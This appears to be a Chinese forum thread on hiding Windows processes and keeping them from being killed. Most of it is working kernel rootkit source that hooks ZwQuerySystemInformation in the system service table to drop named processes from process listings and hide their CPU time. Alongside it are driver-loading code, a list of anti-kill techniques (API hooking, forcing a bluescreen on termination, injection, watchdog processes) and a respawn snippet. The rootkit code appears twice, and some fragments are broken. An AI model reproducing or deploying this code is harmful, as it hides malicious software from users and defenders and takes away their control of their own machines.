while(curr) { //DbgPrint("Current item is %x\n", curr); if (curr->ProcessName.Buffer != NULL) { if(0 == memcmp(curr->ProcessName.Buffer, L"这里是过滤的进程", 2)) { m_UserTime.QuadPart += curr->UserTime.QuadPart; m_KernelTime.QuadPart += curr->KernelTime.QuadPart; if(prev) // Middle or Last entry { if(curr->NextEntryDelta) prev->NextEntryDelta += curr->NextEntryDelta; else // we are last, so make prev the end prev->NextEntryDelta = 0; } else { if(curr->NextEntryDelta) { // we are first in the list, so move it forward (char *)SystemInformation += curr->NextEntryDelta; } else // we are the only process! SystemInformation = NULL; } } } else // This is the entry for the Idle process { // Add the kernel and user times of _root_* // processes to the Idle process. curr->UserTime.QuadPart += m_UserTime.QuadPart; curr->KernelTime.QuadPart += m_KernelTime.QuadPart; // Reset the timers for next time we filter m_UserTime.QuadPart = m_KernelTime.QuadPart = 0; } prev = curr; if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta); else curr = NULL; } } else if (SystemInformationClass == 8) // Query for SystemProcessorTimes { struct _SYSTEM_PROCESSOR_TIMES * times = (struct _SYSTEM_PROCESSOR_TIMES *)SystemInformation; times->IdleTime.QuadPart += m_UserTime.QuadPart + m_KernelTime.QuadPart; } } return ntStatus; } VOID OnUnload(IN PDRIVER_OBJECT DriverObject) { DbgPrint("ROOTKIT: OnUnload called\n"); // unhook system calls UNHOOK_SYSCALL( ZwQuerySystemInformation, OldZwQuerySystemInformation, NewZwQuerySystemInformation ); // Unlock and Free MDL if(g_pmdlSystemCall) { MmUnmapLockedPages(MappedSystemCallTable, g_pmdlSystemCall); IoFreeMdl(g_pmdlSystemCall); } } NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath) { // Register a dispatch function for Unload theDriverObject->DriverUnload = OnUnload; // Initialize global times to zero // These variables will account for the // missing time our hidden processes are // using. m_UserTime.QuadPart = m_KernelTime.QuadPart = 0; // save old system call locations OldZwQuerySystemInformation =(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)); // Map the memory into our domain so we can change the permissions on the MDL g_pmdlSystemCall = MmCreateMdl(NULL, KeServiceDescriptorTable.ServiceTableBase, KeServiceDescriptorTable.NumberOfServices*4); if(!g_pmdlSystemCall) return STATUS_UNSUCCESSFUL; MmBuildMdlForNonPagedPool(g_pmdlSystemCall); // Change the flags of the MDL g_pmdlSystemCall->MdlFlags = g_pmdlSystemCall->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA; MappedSystemCallTable = MmMapLockedPages(g_pmdlSystemCall, KernelMode); // hook system calls HOOK_SYSCALL( ZwQuerySystemInformation, NewZwQuerySystemInformation, OldZwQuerySystemInformation );
return STATUS_SUCCESS; }
安装驱动: #include <windows.h>#define PRIVATE static/**************************************************************************** * * FUNCTION: InstallDriver( IN SC_HANDLE, IN LPCTSTR, IN LPCTSTR) * * PURPOSE: Creates a driver service. * ****************************************************************************/ PRIVATE BOOL InstallDriver( IN SC_HANDLE SchSCManager, IN LPCTSTR DriverName, IN LPCTSTR ServiceExe ) { SC_HANDLE schService; // // NOTE: This creates an entry for a standalone driver. If this // is modified for use with a driver that requires a Tag, // Group, and/or Dependencies, it may be necessary to // query the registry for existing driver information // (in order to determine a unique Tag, etc.). // schService = CreateService( SchSCManager, // SCManager database DriverName, // name of service DriverName, // name to display SERVICE_ALL_ACCESS, // desired access SERVICE_KERNEL_DRIVER, // service type SERVICE_DEMAND_START, // start type SERVICE_ERROR_NORMAL, // error control type ServiceExe, // service's binary NULL, // no load ordering group NULL, // no tag identifier NULL, // no dependencies NULL, // LocalSystem account NULL // no password ); if ( schService == NULL ) return FALSE; CloseServiceHandle( schService ); return TRUE; } /**************************************************************************** * * FUNCTION: StartDriver( IN SC_HANDLE, IN LPCTSTR) * * PURPOSE: Starts the driver service. * ****************************************************************************/ PRIVATE BOOL StartDriver( IN SC_HANDLE SchSCManager, IN LPCTSTR DriverName ) { SC_HANDLE schService; BOOL ret; schService = OpenService( SchSCManager, DriverName, SERVICE_ALL_ACCESS ); if ( schService == NULL ) return FALSE; ret = StartService( schService, 0, NULL ) || GetLastError() == ERROR_SERVICE_ALREADY_RUNNING; CloseServiceHandle( schService ); return ret; }/**************************************************************************** * * FUNCTION: OpenDevice( IN LPCTSTR, HANDLE *) * * PURPOSE: Opens the device and returns a handle if desired. * ****************************************************************************/ PRIVATE BOOL OpenDevice( IN LPCTSTR DriverName, HANDLE * lphDevice ) { TCHAR completeDeviceName[64]; HANDLE hDevice; // // Create a \\.\XXX device name that CreateFile can use // // NOTE: We're making an assumption here that the driver // has created a symbolic link using it's own name // (i.e. if the driver has the name "XXX" we assume // that it used IoCreateSymbolicLink to create a // symbolic link "\DosDevices\XXX". Usually, there // is this understanding between related apps/drivers. // // An application might also peruse the DEVICEMAP // section of the registry, or use the QueryDosDevice // API to enumerate the existing symbolic links in the // system. // wsprintf( completeDeviceName, TEXT("\\\\.\\%s"), DriverName ); hDevice = CreateFile( completeDeviceName, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL ); if ( hDevice == ((HANDLE)-1) ) return FALSE; // If user wants handle, give it to them. Otherwise, just close it. if ( lphDevice ) *lphDevice = hDevice; else CloseHandle( hDevice ); return TRUE; } /**************************************************************************** * * FUNCTION: StopDriver( IN SC_HANDLE, IN LPCTSTR) * * PURPOSE: Has the configuration manager stop the driver (unload it) * ****************************************************************************/ PRIVATE BOOL StopDriver( IN SC_HANDLE SchSCManager, IN LPCTSTR DriverName ) { SC_HANDLE schService; BOOL ret; SERVICE_STATUS serviceStatus; schService = OpenService( SchSCManager, DriverName, SERVICE_ALL_ACCESS ); if ( schService == NULL ) return FALSE; ret = ControlService( schService, SERVICE_CONTROL_STOP, &serviceStatus ); CloseServiceHandle( schService ); return ret; }/**************************************************************************** * * FUNCTION: RemoveDriver( IN SC_HANDLE, IN LPCTSTR) * * PURPOSE: Deletes the driver service. * ****************************************************************************/ PRIVATE BOOL RemoveDriver( IN SC_HANDLE SchSCManager, IN LPCTSTR DriverName ) { SC_HANDLE schService; BOOL ret; schService = OpenService( SchSCManager, DriverName, SERVICE_ALL_ACCESS ); if ( schService == NULL ) return FALSE; ret = DeleteService( schService ); CloseServiceHandle( schService ); return ret; } /**************************************************************************** * * FUNCTION: UnloadDeviceDriver( const TCHAR *) * * PURPOSE: Stops the driver and has the configuration manager unload it. * ****************************************************************************/ BOOL UnloadDeviceDriver( const TCHAR * Name ) { SC_HANDLE schSCManager; schSCManager = OpenSCManager( NULL, // machine (NULL == local) NULL, // database (NULL == default) SC_MANAGER_ALL_ACCESS // access required ); StopDriver( schSCManager, Name ); RemoveDriver( schSCManager, Name ); CloseServiceHandle( schSCManager ); return TRUE; }/**************************************************************************** * * FUNCTION: LoadDeviceDriver( const TCHAR, const TCHAR, HANDLE *) * * PURPOSE: Registers a driver with the system configuration manager * and then loads it. * ****************************************************************************/ BOOL LoadDeviceDriver( const TCHAR * Name, const TCHAR * Path, HANDLE * lphDevice ) { SC_HANDLE schSCManager; BOOL okay; schSCManager = OpenSCManager( NULL, NULL, SC_MANAGER_ALL_ACCESS ); // Remove old instances RemoveDriver( schSCManager, Name ); // Ignore success of installation: it may already be installed. InstallDriver( schSCManager, Name, Path ); // Ignore success of start: it may already be started. StartDriver( schSCManager, Name ); // Do make sure we can open it. okay = OpenDevice( Name, lphDevice ); CloseServiceHandle( schSCManager ); return okay; }
哪里定义的,我看好现实一些预定义的接口。
http://bbs.pediy.com/archive/index.php?t-27364.html
如果只是防止在用户层被杀掉,那方法倒是有不少的.
1.使用hook一些杀进程的API,或一些回调API,或ZwOpenProcess()等(要使用驱动)
2.将程序进程提升与系统设备挂钩,进程一被杀,系统马上蓝屏(一般用户层可以实现,不是防杀,只不过如果程序死了,系统一起死)
3.插入到其它进程(一般用户层可实现,但因为是插入到其它进程中去,我并不认为程序有自己的进程,而且现在的HIP全都防这个,有防病毒的系统,估计都会报,而且可以将插入的DLL从进程中释放出来的,只不过要用一些工具)
4.双进程保护(一般用户层可实现,但这个不是防被杀掉,而且如果两个进程都被杀,不可能恢复起来)
#include "ntddk.h"#pragma pack(1)
typedef struct ServiceDescriptorEntry {
unsigned int *ServiceTableBase;
unsigned int *ServiceCounterTableBase; //Used only in checked build
unsigned int NumberOfServices;
unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
#pragma pack()__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;
#define SYSTEMSERVICE(_function) KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_function+1)]
PMDL g_pmdlSystemCall;
PVOID *MappedSystemCallTable;
#define SYSCALL_INDEX(_Function) *(PULONG)((PUCHAR)_Function+1)
#define HOOK_SYSCALL(_Function, _Hook, _Orig ) \
_Orig = (PVOID) InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)#define UNHOOK_SYSCALL(_Function, _Hook, _Orig ) \
InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)
struct _SYSTEM_THREADS
{
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientIs;
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
ULONG ThreadState;
KWAIT_REASON WaitReason;
};struct _SYSTEM_PROCESSES
{
ULONG NextEntryDelta;
ULONG ThreadCount;
ULONG Reserved[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ProcessName;
KPRIORITY BasePriority;
ULONG ProcessId;
ULONG InheritedFromProcessId;
ULONG HandleCount;
ULONG Reserved2[2];
VM_COUNTERS VmCounters;
IO_COUNTERS IoCounters; //windows 2000 only
struct _SYSTEM_THREADS Threads[1];
};// Added by Creative of rootkit.com
struct _SYSTEM_PROCESSOR_TIMES
{
LARGE_INTEGER IdleTime;
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER DpcTime;
LARGE_INTEGER InterruptTime;
ULONG InterruptCount;
};
NTSYSAPI
NTSTATUS
NTAPI ZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)(
ULONG SystemInformationCLass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);ZWQUERYSYSTEMINFORMATION OldZwQuerySystemInformation;// Added by Creative of rootkit.com
LARGE_INTEGER m_UserTime;
LARGE_INTEGER m_KernelTime;///////////////////////////////////////////////////////////////////////
// NewZwQuerySystemInformation function
//
// ZwQuerySystemInformation() returns a linked list of processes.
// The function below imitates it, except it removes from the list any
// process who's name begins with "_root_".NTSTATUS NewZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength)
{ NTSTATUS ntStatus; ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) (
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength ); if( NT_SUCCESS(ntStatus))
{
// Asking for a file and directory listing
if(SystemInformationClass == 5)
{
// This is a query for the process list.
// Look for process names that start with
// '_root_' and filter them out.
struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
struct _SYSTEM_PROCESSES *prev = NULL;
while(curr)
{
//DbgPrint("Current item is %x\n", curr);
if (curr->ProcessName.Buffer != NULL)
{
if(0 == memcmp(curr->ProcessName.Buffer, L"这里是过滤的进程", 2))
{
m_UserTime.QuadPart += curr->UserTime.QuadPart;
m_KernelTime.QuadPart += curr->KernelTime.QuadPart; if(prev) // Middle or Last entry
{
if(curr->NextEntryDelta)
prev->NextEntryDelta += curr->NextEntryDelta;
else // we are last, so make prev the end
prev->NextEntryDelta = 0;
}
else
{
if(curr->NextEntryDelta)
{
// we are first in the list, so move it forward
(char *)SystemInformation += curr->NextEntryDelta;
}
else // we are the only process!
SystemInformation = NULL;
}
}
}
else // This is the entry for the Idle process
{
// Add the kernel and user times of _root_*
// processes to the Idle process.
curr->UserTime.QuadPart += m_UserTime.QuadPart;
curr->KernelTime.QuadPart += m_KernelTime.QuadPart; // Reset the timers for next time we filter
m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;
}
prev = curr;
if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta);
else curr = NULL;
}
}
else if (SystemInformationClass == 8) // Query for SystemProcessorTimes
{
struct _SYSTEM_PROCESSOR_TIMES * times = (struct _SYSTEM_PROCESSOR_TIMES *)SystemInformation;
times->IdleTime.QuadPart += m_UserTime.QuadPart + m_KernelTime.QuadPart;
} }
return ntStatus;
}
VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{
DbgPrint("ROOTKIT: OnUnload called\n"); // unhook system calls
UNHOOK_SYSCALL( ZwQuerySystemInformation, OldZwQuerySystemInformation, NewZwQuerySystemInformation ); // Unlock and Free MDL
if(g_pmdlSystemCall)
{
MmUnmapLockedPages(MappedSystemCallTable, g_pmdlSystemCall);
IoFreeMdl(g_pmdlSystemCall);
}
}
NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject,
IN PUNICODE_STRING theRegistryPath)
{
// Register a dispatch function for Unload
theDriverObject->DriverUnload = OnUnload; // Initialize global times to zero
// These variables will account for the
// missing time our hidden processes are
// using.
m_UserTime.QuadPart = m_KernelTime.QuadPart = 0; // save old system call locations
OldZwQuerySystemInformation =(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)); // Map the memory into our domain so we can change the permissions on the MDL
g_pmdlSystemCall = MmCreateMdl(NULL, KeServiceDescriptorTable.ServiceTableBase, KeServiceDescriptorTable.NumberOfServices*4);
if(!g_pmdlSystemCall)
return STATUS_UNSUCCESSFUL; MmBuildMdlForNonPagedPool(g_pmdlSystemCall); // Change the flags of the MDL
g_pmdlSystemCall->MdlFlags = g_pmdlSystemCall->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA; MappedSystemCallTable = MmMapLockedPages(g_pmdlSystemCall, KernelMode); // hook system calls
HOOK_SYSCALL( ZwQuerySystemInformation, NewZwQuerySystemInformation, OldZwQuerySystemInformation );
return STATUS_SUCCESS;
}
#include <windows.h>#define PRIVATE static/****************************************************************************
*
* FUNCTION: InstallDriver( IN SC_HANDLE, IN LPCTSTR, IN LPCTSTR)
*
* PURPOSE: Creates a driver service.
*
****************************************************************************/
PRIVATE BOOL InstallDriver( IN SC_HANDLE SchSCManager, IN LPCTSTR DriverName, IN LPCTSTR ServiceExe )
{
SC_HANDLE schService; //
// NOTE: This creates an entry for a standalone driver. If this
// is modified for use with a driver that requires a Tag,
// Group, and/or Dependencies, it may be necessary to
// query the registry for existing driver information
// (in order to determine a unique Tag, etc.).
// schService = CreateService( SchSCManager, // SCManager database
DriverName, // name of service
DriverName, // name to display
SERVICE_ALL_ACCESS, // desired access
SERVICE_KERNEL_DRIVER, // service type
SERVICE_DEMAND_START, // start type
SERVICE_ERROR_NORMAL, // error control type
ServiceExe, // service's binary
NULL, // no load ordering group
NULL, // no tag identifier
NULL, // no dependencies
NULL, // LocalSystem account
NULL // no password
);
if ( schService == NULL )
return FALSE; CloseServiceHandle( schService ); return TRUE;
}
/****************************************************************************
*
* FUNCTION: StartDriver( IN SC_HANDLE, IN LPCTSTR)
*
* PURPOSE: Starts the driver service.
*
****************************************************************************/
PRIVATE BOOL StartDriver( IN SC_HANDLE SchSCManager, IN LPCTSTR DriverName )
{
SC_HANDLE schService;
BOOL ret; schService = OpenService( SchSCManager,
DriverName,
SERVICE_ALL_ACCESS
);
if ( schService == NULL )
return FALSE; ret = StartService( schService, 0, NULL )
|| GetLastError() == ERROR_SERVICE_ALREADY_RUNNING; CloseServiceHandle( schService );
return ret;
}/****************************************************************************
*
* FUNCTION: OpenDevice( IN LPCTSTR, HANDLE *)
*
* PURPOSE: Opens the device and returns a handle if desired.
*
****************************************************************************/
PRIVATE BOOL OpenDevice( IN LPCTSTR DriverName, HANDLE * lphDevice )
{
TCHAR completeDeviceName[64];
HANDLE hDevice; //
// Create a \\.\XXX device name that CreateFile can use
//
// NOTE: We're making an assumption here that the driver
// has created a symbolic link using it's own name
// (i.e. if the driver has the name "XXX" we assume
// that it used IoCreateSymbolicLink to create a
// symbolic link "\DosDevices\XXX". Usually, there
// is this understanding between related apps/drivers.
//
// An application might also peruse the DEVICEMAP
// section of the registry, or use the QueryDosDevice
// API to enumerate the existing symbolic links in the
// system.
// wsprintf( completeDeviceName, TEXT("\\\\.\\%s"), DriverName ); hDevice = CreateFile( completeDeviceName,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if ( hDevice == ((HANDLE)-1) )
return FALSE; // If user wants handle, give it to them. Otherwise, just close it.
if ( lphDevice )
*lphDevice = hDevice;
else
CloseHandle( hDevice ); return TRUE;
}
/****************************************************************************
*
* FUNCTION: StopDriver( IN SC_HANDLE, IN LPCTSTR)
*
* PURPOSE: Has the configuration manager stop the driver (unload it)
*
****************************************************************************/
PRIVATE BOOL StopDriver( IN SC_HANDLE SchSCManager, IN LPCTSTR DriverName )
{
SC_HANDLE schService;
BOOL ret;
SERVICE_STATUS serviceStatus; schService = OpenService( SchSCManager, DriverName, SERVICE_ALL_ACCESS );
if ( schService == NULL )
return FALSE; ret = ControlService( schService, SERVICE_CONTROL_STOP, &serviceStatus ); CloseServiceHandle( schService ); return ret;
}/****************************************************************************
*
* FUNCTION: RemoveDriver( IN SC_HANDLE, IN LPCTSTR)
*
* PURPOSE: Deletes the driver service.
*
****************************************************************************/
PRIVATE BOOL RemoveDriver( IN SC_HANDLE SchSCManager, IN LPCTSTR DriverName )
{
SC_HANDLE schService;
BOOL ret; schService = OpenService( SchSCManager,
DriverName,
SERVICE_ALL_ACCESS
); if ( schService == NULL )
return FALSE; ret = DeleteService( schService ); CloseServiceHandle( schService ); return ret;
}
/****************************************************************************
*
* FUNCTION: UnloadDeviceDriver( const TCHAR *)
*
* PURPOSE: Stops the driver and has the configuration manager unload it.
*
****************************************************************************/
BOOL UnloadDeviceDriver( const TCHAR * Name )
{
SC_HANDLE schSCManager; schSCManager = OpenSCManager( NULL, // machine (NULL == local)
NULL, // database (NULL == default)
SC_MANAGER_ALL_ACCESS // access required
);
StopDriver( schSCManager, Name );
RemoveDriver( schSCManager, Name );
CloseServiceHandle( schSCManager ); return TRUE;
}/****************************************************************************
*
* FUNCTION: LoadDeviceDriver( const TCHAR, const TCHAR, HANDLE *)
*
* PURPOSE: Registers a driver with the system configuration manager
* and then loads it.
*
****************************************************************************/
BOOL LoadDeviceDriver( const TCHAR * Name, const TCHAR * Path, HANDLE * lphDevice )
{
SC_HANDLE schSCManager;
BOOL okay; schSCManager = OpenSCManager( NULL, NULL, SC_MANAGER_ALL_ACCESS );
// Remove old instances
RemoveDriver( schSCManager, Name ); // Ignore success of installation: it may already be installed.
InstallDriver( schSCManager, Name, Path ); // Ignore success of start: it may already be started.
StartDriver( schSCManager, Name ); // Do make sure we can open it.
okay = OpenDevice( Name, lphDevice ); CloseServiceHandle( schSCManager ); return okay;
}
你要让我看到一个进程 并且 我在资源管理器里面还KILL不掉的话。。
这个东西就惨了我会花非常大的精力 去整死它 整死为止。
并且 我会将整死的方法 公布出去 那这个流氓也就完了
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)//////处理CreateProcess的参数if (GetExitCodeProcess(pProcessInfo.hProcess,&dwExitCode))
{ CreateProcess(
appPath,//应用程序名称
pCmdLine, //命令行
NULL, //进程句柄不能被继承
NULL, //线程句柄不能被继承
FALSE,
NULL,
NULL,
NULL,
&stStartUpInfo,
&pProcessInfo);
}
}
bool verifyProcess(LPCTSTR lpszProcessName)
{
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE) {
MessageBox(NULL, "Create process snapshot failed !", "Notice", MB_ICONINFORMATION | MB_OK);
return false;
}
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(PROCESSENTRY32);
if (!Process32First(hSnapshot, &pe32)) {
MessageBox(NULL, "Process32Frist function runs failed !", "Notice", MB_ICONINFORMATION | MB_OK);
CloseHandle(hSnapshot);
return false;
}
WCHAR wszProcess[MAX_PATH];
MultiByteToWideChar(CP_ACP, 0, lpszProcessName,
strlen(lpszProcessName)+1, wszProcess, sizeof(wszProcess)/sizeof(wszProcess[0]));
do {
if (!lstrcmp(lpszProcessName, pe32.szExeFile))
return true;
} while(Process32Next(hSnapshot, &pe32));
CloseHandle(hSnapshot);
return false;
}